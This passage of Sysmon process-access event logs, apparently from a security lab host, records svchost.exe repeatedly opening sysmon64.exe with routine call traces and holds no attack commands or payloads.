05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 